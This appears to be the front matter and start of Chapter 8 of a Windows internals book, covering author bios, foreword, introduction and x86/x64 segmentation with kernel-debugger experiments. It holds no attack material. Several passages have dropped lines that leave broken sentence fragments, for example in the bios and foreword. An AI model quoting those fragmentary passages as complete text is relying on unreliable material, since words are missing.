Page table . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .745
Minstore I/O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .746
ReFS architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .748
ReFS on-disk structure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 751
Object IDs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .752
Security and change journal . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .753
ReFS advanced features . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .754
File’s block cloning (snapshot support) and sparse VDL . . . . . . . . . .754
ReFS write-through . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .757
ReFS recovery support . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .759
Leak detection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 761
Shingled magnetic recording (SMR) volumes . . . . . . . . . . . . . . . . . . .762
ReFS support for tiered volumes and SMR . . . . . . . . . . . . . . . . . . . . . . .764
Container compaction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .766
Compression and ghosting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .769
Storage Spaces . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .770
Spaces internal architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 771
Services provided by Spaces. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .772
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .776
Chapter 12 Startup and shutdown
777
Boot process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .777
The UEFI boot . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .777
The BIOS boot process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 781
Secure Boot . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 781
The Windows Boot Manager . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .785
The Boot menu . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .799
Launching a boot application . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .800
Measured Boot . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 801
Trusted execution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .805
The Windows OS Loader . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .808
Booting from iSCSI . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 811
The hypervisor loader . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 811
VSM startup policy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 813
The Secure Launch . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 816
Initializing the kernel and executive subsystems . . . . . . . . . . . . . . . . . 818
Kernel initialization phase 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .824
Smss, Csrss, and Wininit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .830
ReadyBoot . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .835
Images that start automatically . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .837
Shutdown . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .837
Hibernation and Fast Startup . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 840
Windows Recovery Environment (WinRE) . . . . . . . . . . . . . . . . . . . . . . .845
Safe mode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .847
Driver loading in safe mode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 848
Safe-mode-aware user programs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .849
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .850
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .850
Contents of Windows Internals, Seventh Edition, Part 1 . . . . . . . . . . . . . . . . .851
Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .861
About the Authors
ANDREA ALLIEVI is a system-level developer and security research
engineer with more than 15 years of experience. He graduated from
the University of Milano-Bicocca in 2010 with a bachelor’s degree in
computer science. For his thesis, he developed a Master Boot Record
(MBR) Bootkit entirely in 64-bit code, capable of defeating all the Windows
7 kernel-protections (PatchGuard and Driver Signing enforcement).
Andrea is also a reverse engineer who specializes in operating systems
internals, from kernel-level code all the way to user-mode code. He
published in 2012), multiple PatchGuard bypasses, and many other research papers and
articles. He is the author of multiple system tools and software used for removing
malware and advanced persistent threats. In his career, he has worked in various computer
security companies—Italian TgSoft, Saferbytes (now MalwareBytes), and Talos group of
Cisco Systems Inc. He originally joined Microsoft in 2016 as a security research engineer
in the Microsoft Threat Intelligence Center (MSTIC) group. Since January 2018, Andrea
has been a senior core OS engineer in the Kernel Security Core team of Microsoft,
where he mainly maintains and develops new features (like Retpoline or the Speculation
Mitigations) for the NT and Secure Kernel.
Andrea continues to be active in the security research community, authoring technical
articles on new kernel features of Windows in the Microsoft Windows Internals blog, and
speaking at multiple technical conferences, such as Recon and Microsoft BlueHat. Follow
Andrea on Twitter at @aall86.
ALEX IONESCU is the vice president of endpoint engineering at
CrowdStrike, Inc., where he started as its founding chief architect. Alex is
a world-class security architect and consultant expert in low-level system
software, kernel development, security training, and reverse engineering.
Over more than two decades, his security research work has led to the
repair of dozens of critical security vulnerabilities in the Windows kernel
and its related components, as well as multiple behavioral bugs.
Previously, Alex was the lead kernel developer for ReactOS, an open-source Windows
clone written from scratch, for which he wrote most of the Windows NT-based subsys-
tems. During his studies in computer science, Alex worked at Apple on the iOS kernel,
boot loader, and drivers on the original core platform team behind the iPhone, iPad, and
AppleTV. Alex is also the founder of Winsider Seminars & Solutions, Inc., a company that
specializes in low-level system software, reverse engineering, and security training for
various institutions.
Alex continues to be active in the community and has spoken at more than two dozen
events around the world. He offers Windows Internals training, support, and resources
to organizations and individuals worldwide. Follow Alex on Twitter at @aionescu and his
blogs at www.alex-ionescu.com and www.windows-internals.com/blog.
Foreword
Having used and explored the internals of the wildly successful Windows 3.1 operat-
ing system, I immediately recognized the world-changing nature of Windows NT 3.1
when Microsoft released it in 1993. David Cutler, the architect and engineering leader for
Windows NT, had created a version of Windows that was secure, reliable, and scalable,
but with the same user interface and ability to run the same software as its older yet
more immature sibling. Helen Custer’s book Inside Windows NT was a fantastic guide to
its design and architecture, but I believed that there was a need for and interest in a book
that went deeper into its working details. VAX/VMS Internals and Data Structures, the
you could get with text, and I decided that I was going to write the Windows NT version
of that book.
-
ware company. To learn about Windows NT, I read documentation, reverse-engineered
its code, and wrote systems monitoring tools like Regmon and Filemon that helped me
understand the design by coding them and using them to observe the under-the-hood
views they gave me of Windows NT’s operation. As I learned, I shared my newfound
knowledge in a monthly “NT Internals” column in Windows NT Magazine, the magazine
for Windows NT administrators. Those columns would serve as the basis for the chapter-
length versions that I’d publish in Windows Internals, the book I’d contracted to write
with IDG Press.
My book deadlines came and went because my book writing was further slowed by
my full-time job and time I spent writing Sysinternals (then NTInternals) freeware and
commercial software for Winternals Software, my startup. Then, in 1996, I had a shock
when Dave Solomon published Inside Windows NT, 2nd Edition. I found the book both
impressive and depressing. A complete rewrite of Helen's book, it went deeper and
broader into the internals of Windows NT like I was planning on doing, and it incorpo-
rated novel labs that used built-in tools and diagnostic utilities from the Windows NT
Resource Kit and Device Driver Development Kit (DDK) to demonstrate key concepts and
behaviors. He’d raised the bar so high that I knew that writing a book that matched the
quality and depth he’d achieved was even more monumental than what I had planned.
As the saying goes, if you can’t beat them, join them. I knew Dave from the Windows
conference speaking circuit, so within a couple of weeks of the book’s publication I
sent him an email proposing that I join him to coauthor the next edition, which would
document what was then called Windows NT 5 and would eventually be renamed as
Windows 2000. My contribution would be new chapters based on my NT Internals
column about topics Dave hadn’t included, and I’d also write about new labs that used
my Sysinternals tools. To sweeten the deal, I suggested including the entire collection of
Sysinternals tools on a CD that would accompany the book—a common way to distribute
software with books and magazines.
Dave was game. First, though, he had to get approval from Microsoft. I had caused
Microsoft some public relations complications with my public revelations that Windows NT
Workstation and Windows NT Server were the same exact code with different behaviors
based on a Registry setting. And while Dave had full Windows NT source access, I didn’t,
and I wanted to keep it that way so as not to create intellectual property issues with the
software I was writing for Sysinternals or Winternals, which relied on undocumented APIs.
The timing was fortuitous because by the time Dave asked Microsoft, I’d been repairing my
relationship with key Windows engineers, and Microsoft tacitly approved.
Writing Inside Windows 2000 with Dave was incredibly fun. Improbably and
completely coincidentally, he lived about 20 minutes from me (I lived in Danbury,
Connecticut and he lived in Sherman, Connecticut). We’d visit each other’s houses for
marathon writing sessions where we’d explore the internals of Windows together, laugh
at geeky jokes and puns, and pose technical questions that would pit him and me in a
race to find the answer first with the kernel debugger and Sysinternals tools. (Don't rub
it in if you talk to him, but I always won.)
The book continued to track Windows as it became one of the most commercially
successful operating systems of all time. We brought in Alex Ionescu as a coauthor for
the edition covering Windows Vista. Alex is among the best reverse engineers and operating systems experts in the
world, and he added both breadth and depth to the book, matching or exceeding our
high standards for legibility and detail. The increasing scope of the book, combined with
Windows itself growing with new capabilities and subsystems, resulted in the 6th Edition
exceeding the single-spine publishing limit we’d run up against with the 5th Edition, so
we split it into two volumes.
I had already moved to Azure when writing for the sixth edition got underway, and by
the time we were ready for the seventh edition, I no longer had time to contribute to the
book. Dave Solomon had retired, and the task of updating the book became even more
challenging when Windows went from shipping every few years with a major release and
version number to just being called Windows 10 and releasing constantly with feature
and functionality upgrades. Pavel Yosifovitch stepped in to help Alex with Part 1, but he
too became busy with other projects and couldn’t contribute to Part 2. Alex was also
busy with his startup CrowdStrike, so we were unsure if there would even be a Part 2.
Fortunately, Andrea came to the rescue. He and Alex have updated a broad swath of
the system in Part 2, including the startup and shutdown process, Registry subsystem,
and UWP. Not just content to provide a refresh, they’ve also added three new chapters.
The legacy of the Windows Internals book series being the most technically deep and
accurate word on the inner workings of Windows, one of the most important software
releases in history, is secure, and I’m proud to have my name still listed on the byline.
A memorable moment in my career came when we asked David Cutler to write the
foreword for Inside Windows 2000. Dave Solomon and I had visited Microsoft a few times
to meet with the Windows engineers and had met David on a few of the trips. However,
we had no idea if he’d agree, so were thrilled when he did. It’s a bit surreal to now be
on the other side, in a similar position to his when we asked David, and I’m honored to
be given the opportunity. I hope the endorsement my foreword represents gives you
the same confidence in the quality of this book that David Cutler’s did for buyers of
Inside Windows 2000.
Mark Russinovich
Microsoft
March 2021
Bellevue, Washington
Introduction
Windows Internals, Seventh Edition, Part 2 is intended for advanced computer
professionals (developers, security researchers, and system administrators) who
want to understand how the core components of the Microsoft Windows 10 (up to and
including the May 2021 Update, a.k.a. 21H1) and Windows Server (from Server 2016 up
to Server 2022) operating systems work internally, including many components that are
shared with Windows 11X and the Xbox Operating System.
With this knowledge, developers can better comprehend the rationale behind design
decisions to create more powerful, scalable, and secure software. They will also improve
their skills at debugging complex problems rooted deep in the heart of the system.
System administrators can leverage this information as well because understand-
ing how the operating system works “under the hood” facilitates an understanding of
the expected performance behavior of the system. This makes troubleshooting system
problems much easier when things go wrong and empowers the triage of critical issues
from the mundane.
Security researchers can figure out how the operating system can misbehave and be
misused, causing undesirable behavior, while also understanding the mitigations and
security features offered by modern Windows systems against such scenarios. Forensic
experts can learn which data structures and mechanisms can be used to find signs of
tampering.
Whoever the reader might be, after reading this book, they will have a better under-
standing of how Windows works and why it behaves the way it does.
History of the book
This is the seventh edition of a book that was originally called Inside Windows NT
(Microsoft Press, 1992), written by Helen Custer (prior to the initial release of Microsoft
Windows NT 3.1). Inside Windows NT was the first book ever published about Windows
NT and provided key insights into the architecture and design of the system. Inside
Windows NT, Second Edition (Microsoft Press, 1998) was written by David Solomon. It
updated the original book to cover Windows NT 4.0 and had a greatly increased level of
technical depth.
Inside Windows 2000, Third Edition (Microsoft Press, 2000) was authored by David
Solomon and Mark Russinovich. It added many new topics, such as startup and shutdown,
kernel changes in Windows 2000, such as the Windows Driver Model (WDM), Plug and
Play, power management, Windows Management Instrumentation (WMI), encryption, the
job object, and Terminal Services. Windows Internals, Fourth Edition (Microsoft Press, 2004)
was the Windows XP and Windows Server 2003 update and added more content focused
on helping IT professionals make use of their knowledge of Windows internals, such as us-
ing key tools from Windows SysInternals and analyzing crash dumps.
Windows Internals, Fifth Edition (Microsoft Press, 2009) was the update for Windows
Vista and Windows Server 2008. It saw Mark Russinovich move on to a full-time job
at Microsoft (where he is now the Azure CTO) and the addition of a new co-author,
Alex Ionescu. New content included the image loader, user-mode debugging facil-
ity, Advanced Local Procedure Call (ALPC), and Hyper-V. The next release, Windows
Internals, Sixth Edition (Microsoft Press, 2012), was fully updated to address the many
kernel changes in Windows 7 and Windows Server 2008 R2, with many new hands-on
experiments. Because of its size, the sixth edition was split into two parts.
Seventh edition changes
The split of the sixth edition into two parts had the advantage of allowing the authors
to publish parts of the book more quickly than others (March 2012 for Part 1, and
September 2012 for Part 2). At the time, however, this split was purely based on page
counts, with the same overall chapters returning in the same order as in prior editions.
In the meantime, Microsoft had embarked on a convergence of its operating system
kernels, which brought together the Windows 8 and Windows Phone 8 kernels, and
eventually incorporated the modern application environment in Windows 8.1, Windows
RT, and Windows Phone 8.1. The convergence story was complete with Windows 10,
which runs on desktops, laptops, cell phones, servers, Xbox One, HoloLens, and various
Internet of Things (IoT) devices, making it the right time to refresh the series.
With the seventh edition (Microsoft Press, 2017), the authors did just that, joined for
the first time by a new coauthor, Pavel Yosifovich, who took on the role of “insider” and
overall book manager. Working alongside Alex Ionescu, who like Mark, had moved on
to his own full-time job at CrowdStrike (where he is now the VP of endpoint
engineering), Pavel made the decision to refactor the book’s chapters so that the two
parts could be more meaningfully cohesive manuscripts instead of forcing readers to
wait for Part 2 to understand concepts introduced in Part 1. This allowed Part 1 to stand
fully on its own, introducing readers to the key concepts of Windows 10’s system archi-
tecture, process management, thread scheduling, memory management, I/O handling,
plus user, data, and platform security. Part 1 covered aspects of Windows 10 up to and
including Version 1703, the May 2017 Update, as well as Windows Server 2016.
Changes in Part 2
With Alex Ionescu and Mark Russinovich consumed by their full-time jobs, and Pavel
busy with other projects, this part of the book needed a new champion. The authors
are grateful to Andrea Allievi for having eventually stepped up to carry on the mantle
and complete the series. Working with advice and guidance from the other authors,
Andrea turned the book around and brought his own vision to the series.
Realizing that chapters on topics such as networking and crash dump analysis were
beyond today’s readers’ interests, Andrea instead added exciting new content around
Hyper-V, which is now a key part of the Windows platform strategy, both on Azure and
on client systems. This complements fully rewritten chapters on the boot process, on
new storage technologies such as ReFS and DAX, and expansive updates on both system
and management mechanisms, alongside the usual hands-on experiments, which have
been fully updated to take advantage of new debugger technologies and tooling.
The long delay between Parts 1 and 2 made it possible to make sure the book was
fully updated to cover the latest public build of Windows 10, Version 2103 (May 2021
Update / 21H1), including Windows Server 2019 and 2022, such that readers would not be
“behind” after such a long gap. As Windows 11 builds upon the foundation of
the same operating system kernel, readers will be adequately prepared for this upcom-
ing version as well.
Hands-on experiments
Even without access to the Windows source code, you can glean much about Windows
internals from the kernel debugger, tools from SysInternals, and tools developed by the
authors. When a tool can be used to expose or demonstrate some aspect of the internal
behavior of Windows, the steps for trying the tool yourself are
listed in special “EXPERIMENT” sections. These appear throughout the book, and we
encourage you to try them as you’re reading. Seeing visible proof of how Windows works
internally will make much more of an impression on you than just reading about it will.
Topics not covered
Windows is a large and complex operating system. This book doesn’t cover everything
relevant to Windows internals but instead focuses on the base system components. For
example, this book doesn’t describe COM+, the Windows distributed object-oriented pro-
gramming infrastructure, or the Microsoft .NET Framework, the foundation of managed
code applications. Because this is an “internals” book and not a user, programming, or
system administration book, it doesn’t describe how to use, program, or configure Windows.
A warning and a caveat
Because this book describes undocumented behavior of the internal architecture and
the operation of the Windows operating system (such as internal kernel structures and
functions), this content is subject to change between releases. By “subject to change,” we
don’t necessarily mean that details described in this book will change between releases,
but you can’t count on them not changing. Any software that uses these undocumented
interfaces, or insider knowledge about the operating system, might not work on future
releases of Windows. Even worse, software that runs in kernel mode (such as device
drivers) and uses these undocumented interfaces might experience a system crash when
running on a newer release of Windows, resulting in potential loss of data to users of
such software.
In short, you should never use any internal Windows functionality, registry key,
behavior, API, or other undocumented detail mentioned in this book during the devel-
opment of any kind of software designed for end-user systems or for any other purpose
other than research and documentation. Always check with the Microsoft Software
Development Kit (SDK) documentation for a supported way to accomplish a task first.
Assumptions about you
The book assumes the reader is comfortable with working on Windows at a power-user
level and has a basic understanding of operating system and hardware concepts, such as
CPU registers, memory, processes, and threads. Basic understanding of functions,
pointers, and similar C programming language constructs is beneficial.
Organization of this book
The book is divided into two parts (as was the sixth edition), the second of which you’re
holding in your hands.
■ Chapter 8, “System mechanisms,” provides information about the important
internal mechanisms that the operating system uses to provide key services to
device drivers and applications, such as ALPC, the Object Manager, and synchro-
nization routines. It also includes details about the hardware architecture that
Windows runs on, including trap processing, segmentation, and side channel
vulnerabilities, as well as the mitigations required to address them.
■ Chapter 9, “Virtualization technologies,” describes how the Windows OS uses the
virtualization technologies exposed by modern processors to allow users to cre-
ate and use multiple virtual machines on the same system. Virtualization is also
extensively used by Windows to provide a new level of security. Thus, the Secure
Kernel and Isolated User Mode are extensively discussed in this chapter.
■ Chapter 10, “Management, diagnostics, and tracing,” details the fundamental
mechanisms implemented in the operating system for its management, configura-
tion, and diagnostics. In particular, the Windows registry, Windows services, WMI,
and Task Scheduling are introduced along with diagnostics services like Event
Tracing for Windows (ETW) and DTrace.
■ Chapter 11, “Caching and file systems,” describes the cache manager and the file
systems that Windows supports, with particular detail on NTFS and ReFS.
■ Chapter 12, “Startup and shutdown,” describes the flow of operations that occurs
when the system starts and shuts down, and the operating system components
brought on by UEFI, such as Secure Boot, Measured Boot, and Secure Launch.
Conventions
The following conventions are used in this book:
■ Boldface type is used to indicate text that you type as well as interface items that
you are instructed to click or buttons that you are instructed to press.
■ Italic type is used to indicate new terms.
■ Code elements appear in italics or in a monospaced font, depending on context.
■ The first letters of the names of dialog boxes and dialog box elements are capi-
talized—for example, the Save As dialog box.
■ Keyboard shortcuts are indicated by a plus sign (+) separating the key names. For
example, Ctrl+Alt+Delete means that you press the Ctrl, Alt, and Delete keys at
the same time.
About the companion content
We have included companion content to enrich your learning experience. You can down-
load the companion content for this book from the following page:
MicrosoftPressStore.com/WindowsInternals7ePart2/downloads
Acknowledgments
The book contains complex technical details, as well as their reasoning, which are often
hard to describe and understand from an outsider’s perspective. Throughout its history,
this book has relied on the generosity of Microsoft to provide access to the vast swath
of knowledge that exists within the company and the rich development history behind
the Windows operating system. For this Seventh
Edition, Part 2, the authors are grateful to Andrea Allievi for having joined as a main
author and having helped spearhead most of the book and its updated content.
Apart from Andrea, this book wouldn’t contain the depth of technical detail or the
level of accuracy it has without the review, input, and support of key members of the
Windows development team, other experts at Microsoft, and other trusted colleagues,
friends, and experts in their own domains.
It is worth noting that the newly written Chapter 9, “Virtualization technologies”
wouldn’t have been so complete and detailed without the help of Alexander Grest and
Jon Lange, who are world-class subject experts and deserve a special thanks, in particu-
lar for the days that they spent helping Andrea understand the inner details of the most
obscure features of the hypervisor and the Secure Kernel.
Alex would like to extend particular thanks to Arun Kishan, Mehmet Iyigun,
David Weston, and Andy Luhrs, who continue to be advocates for the book and Alex’s
work, and who provided inside access to people and information to increase the
accuracy and completeness of the book.
Furthermore, we want to thank the following people, who provided technical
review and/or input to the book or were simply a source of support and help to the
authors: Saar Amar, Craig Barkhouse, Michelle Bergeron, Joe Bialek, Kevin Broas, Omar
Carey, Neal Christiansen, Chris Fernald, Stephen Finnigan, Elia Florio, James Forshaw,
Andrew Harper, Ben Hillis, Howard Kapustein, Saruhan Karademir, Chris Kleynhans,
John Lambert, Attilio Mainetti, Bill Messmer, Matt Miller, Jake Oshins, Simon Pope,
Matthew Woolman, and Adam Zabrocki.
We continue to thank Ilfak Guilfanov of Hex-Rays (http://www.hex-rays.com) for
the IDA Pro Advanced and Hex-Rays licenses granted to Alex Ionescu, including most
recently a lifetime license, which is an invaluable tool for speeding up the reverse engi-
neering of the Windows kernel. The Hex-Rays team continues to support Alex’s research
and builds relevant new decompiler features in every release, which make writing a book
such as this possible without source code access.
Finally, the authors would like to thank the great staff at Microsoft Press (Pearson)
who have been behind turning this book into a reality. Loretta Yates, Charvi Arora, and
their support staff all deserve a special mention for their unlimited patience from turning
a contract signed in 2018 into an actual book two and a half years later.
Errata and book support
We’ve made every effort to ensure the accuracy of this book and its companion content.
You can access updates to this book—in the form of a list of submitted errata and their
related corrections—at
MicrosoftPressStore.com/WindowsInternals7ePart2/errata
If you discover an error that is not already listed, please submit it to us at the
same page.
For additional book support and information, please visit
http://www.MicrosoftPressStore.com/Support.
Please note that product support for Microsoft software and hardware is not offered
through the previous addresses. For help with Microsoft software or hardware, go to
http://support.microsoft.com.
Stay in touch
Let’s keep the conversation going! We’re on Twitter: @MicrosoftPress.
CHAPTER 8
System mechanisms
The Windows operating system provides several base mechanisms that kernel-mode components
such as the executive, the kernel, and device drivers use. This chapter explains the following system
mechanisms and describes how they are used:
■ Processor execution model, including ring levels, segmentation, task states, trap dispatching,
including interrupts, deferred procedure calls (DPCs), asynchronous procedure calls (APCs),
timers, system worker threads, exception dispatching, and system service dispatching
■ Speculative execution barriers and other software-side channel mitigations
■ The executive Object Manager
■ Synchronization, including spinlocks, kernel dispatcher objects, wait dispatching, and user-
mode-specific synchronization primitives such as condition variables and slim reader-writer
(SRW) locks
■ Advanced Local Procedure Call (ALPC) subsystem
■ WoW64
■ User-mode debugging framework
Additionally, this chapter also includes detailed information on the Universal Windows Platform
(UWP) and the set of user-mode and kernel-mode services that power it, such as the following:
I
Packaged Applications and the AppX Deployment Service
I
Centennial Applications and the Windows Desktop Bridge
I
Process State Management (PSM) and the Process Lifetime Manager (PLM)
I
Host Activity Moderator (HAM) and Background Activity Moderator (BAM)
Processor execution model
This section takes a deep look at the internal mechanics of Intel i386–based processor architecture and
its extension, the AMD64-based architecture used on modern systems. Although the two respective
architectures differ in various ways, the mechanisms covered here are common to both.
We discuss concepts such as segmentation, tasks, and ring levels, which are critical mechanisms, and
we discuss the concept of traps, interrupts, and system calls.
Segmentation
High-level programming languages such as C/C++ and Rust are compiled down to machine-level code,
often called assembler or assembly code. In this low-level language, processor registers are accessed
directly, and there are often three primary types of registers that programs access (which are visible
when debugging code):
■ The Program Counter (PC), which in x86/x64 architecture is called the Instruction Pointer (IP)
and is represented by the EIP (x86) and RIP (x64) register. This register always points to the line
of assembly code that is executing (except for certain 32-bit ARM architectures).
■ The Stack Pointer (SP), which is represented by the ESP (x86) and RSP (x64) register. This register
points to the location in memory that is holding the current stack location.
■ Other General Purpose Registers (GPRs) include registers such as EAX/RAX, ECX/RCX, EDX/RDX,
ESI/RSI and R8-R14, just to name a few examples.
Although these registers can contain address values that point to memory, additional registers
are involved when accessing these memory locations as part of a mechanism called protected mode
segmentation. This works by checking against various segment registers, also called selectors:
■ Accesses to the Program Counter are checked against the code segment (CS) register.
■ Accesses to the Stack Pointer are checked against the stack segment (SS) register.
■ Accesses to other registers are determined by a segment override prefix, whose encoding can be
used to force checking against a specific segment, such as DS, ES, or FS.
These selectors live in 16-bit segment registers and are looked up in a data structure called the
Global Descriptor Table (GDT). To locate the GDT, the processor uses yet another CPU register, the GDT
Register, or GDTR.
FIGURE 8-1 Format of a segment selector: the offset (index) into the descriptor table, the Table
Indicator (TI) bit, and the Ring Level (0-3).
The offset located in the segment selector is thus looked up in the GDT, unless the TI bit is set, in
which case a different structure, the Local Descriptor Table (LDT), is used. The LDT is located through its
own dedicated CPU register instead and is not used anymore in the modern Windows OS. The result of
the lookup is a segment entry.
This entry, called segment descriptor in modern operating systems, serves two critical purposes:
■ For a code segment, it indicates the ring level, also called the Code Privilege Level (CPL), at which
code running with this segment selector loaded will execute. This ring level, which can be from
0 to 3, determines the privilege of the currently executing code. Operating systems such as
Windows use Ring 0 to run kernel mode components and drivers, and Ring 3 to run applications
and services. Additionally, on x64 systems, the code segment also indicates whether this is a
Long Mode or Compatibility Mode segment. The former is used to allow the native execution of
x64 code, whereas the latter activates legacy compatibility with x86. A similar mechanism exists
on x86 systems, where a segment can be marked as a 16-bit segment or a 32-bit segment.
■ For a data segment, it indicates the Descriptor Privilege Level (DPL), the highest ring level that
may access the segment. Although segmentation is largely unused for protection on mod-
ern systems, the processor still enforces (and applications still expect) this to be set up correctly.
Additionally, a segment descriptor contains a base address, which will add that value
to any value already loaded in a register that is referencing this segment with an override. A correspond-
ing segment limit is then used to check whether the resulting address lies within the segment.
On x64 systems, the base address is handled as follows:
■ If the Code Segment is a Long Mode segment, the base address in the GDT entry is ignored and
treated as 0, with the exception of the FS and GS segments, whose base addresses instead come
from Model-Specific Registers (MSRs). For GS, the processor looks at the current swap state,
which can be modified with the swapgs instruction, and loads either the user or the kernel GS
base at the appropriate offset. The limit is ignored.
■ If the Code Segment is a Compatibility Mode segment, then read the base address as normal
from the appropriate GDT entry (or LDT entry if the TI bit is set). The limit is enforced and vali-
dated against the offset in the register following the segment override.
This ability to change a segment’s base address is exploited by Windows to achieve a sort of
thread-local register effect: per-thread and per-processor structures such as the TEB and the KPCR are
accessed through a segment whose base address points at them.
Therefore, segmentation is used to achieve two effects on Windows—encode and enforce the
level of privilege that a piece of code can execute with at the processor level and provide direct access to
key per-thread and per-processor data structures. Additionally,
since the GDT is pointed to by a CPU register—the GDTR—each CPU can have its own GDT. In fact, this is
exactly what Windows does, guaranteeing that the appropriate per-processor structures are reachable
through each processor’s GDT, and
that the TEB of the currently executing thread on the current processor is equally present in its segment.
EXPERIMENT: Viewing the GDT on an x64 system
You can view the contents of the GDT, including the state of all segments and their base addresses
(when relevant) by using the dg debugger command, if you are doing remote debugging or
analyzing a crash dump. The command accepts the
starting segment and the ending segment, which will be 10 and 50 in this example:
0: kd> dg 10 50
P Si Gr Pr Lo
Sel Base Limit Type l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0010 00000000`00000000 00000000`00000000 Code RE Ac 0 Nb By P Lo 0000029b
0018 00000000`00000000 00000000`00000000 Data RW Ac 0 Bg By P Nl 00000493
0020 00000000`00000000 00000000`ffffffff Code RE Ac 3 Bg Pg P Nl 00000cfb
0028 00000000`00000000 00000000`ffffffff Data RW Ac 3 Bg Pg P Nl 00000cf3
0030 00000000`00000000 00000000`00000000 Code RE Ac 3 Nb By P Lo 000002fb
0050 00000000`00000000 00000000`00003c00 Data RW Ac 3 Bg By P Nl 000004f3
The key segments here are 10h, 18h, 20h, 28h, 30h, and 50h. (This output was cleaned up a bit
to remove entries that are not relevant to this discussion.)
The segment at 10h is the Ring 0 code segment used by the kernel, as you can tell from
the number 0 under the Pl column, the letters “Lo” under the Long column, and the type being
Code. Similarly, the segment at 30h is the Ring 3 Long Mode code segment used for native x64
code, whereas the segment at 20h is marked Nl (not long, that is,
compatibility mode), which is the segment used for executing x86 code under the WoW64 sub-
system. The remaining segments are used for
the stack, data, and extended segment.
address of the TEB will be stored when running under compatibility mode, as was explained earlier.
For native x64 code, the bases come from MSRs instead, and you can verify them by dumping the
GS_BASE (C0000101h) and KERNEL_GS_BASE (C0000102h) MSRs,
which can be done with the following commands if you are doing local or remote kernel debug-
ging (these commands will not work with a crash dump):
lkd> rdmsr c0000101
msr[c0000101] = ffffb401`a3b80000
lkd> rdmsr c0000102
msr[c0000102] = 000000e5`6dbe9000
You can compare these values with those of @$pcr and @$teb, which should show you the
same values, as below:
lkd> dx -r0 @$pcr
@$pcr
: 0xffffb401a3b80000 [Type: _KPCR *]
lkd> dx -r0 @$teb
@$teb
: 0xe56dbe9000 [Type: _TEB *]
EXPERIMENT: Viewing the GDT on an x86 system
On an x86 system, the GDT is laid out with similar segments, but at different selectors. Addition-
ally, due to the use of a real FS segment instead of the swapgs functionality, and due to the lack of
Long Mode, the number of selectors is a little different, as you can see here:
kd> dg 8 38
P Si Gr Pr Lo
Sel Base Limit Type l ze an es ng Flags
---- -------- -------- ---------- - -- -- -- -- --------
0008 00000000 ffffffff Code RE Ac 0 Bg Pg P Nl 00000c9b
0010 00000000 ffffffff Data RW Ac 0 Bg Pg P Nl 00000c93
0018 00000000 ffffffff Code RE 3 Bg Pg P Nl 00000cfa
0020 00000000 ffffffff Data RW Ac 3 Bg Pg P Nl 00000cf3
0030 80a9e000 00006020 Data RW Ac 0 Bg By P Nl 00000493
0038 00000000 00000fff Data RW 3 Bg By P Nl 000004f2
Once again, Ring 0 and Ring 3 code segments are present, along with segments for the stack,
data, and extended segment. The segment at 30h, however, has a real base address (80a9e000 in
this example), because the kernel uses it to make FS point to the KPCR, while the segment at 38h
is used to make FS point to the TEB in user mode—an actual, active use
for segmentation on these systems.
Lazy segment loading
Based on the description and values of the segments described earlier, it may be surprising to investi-
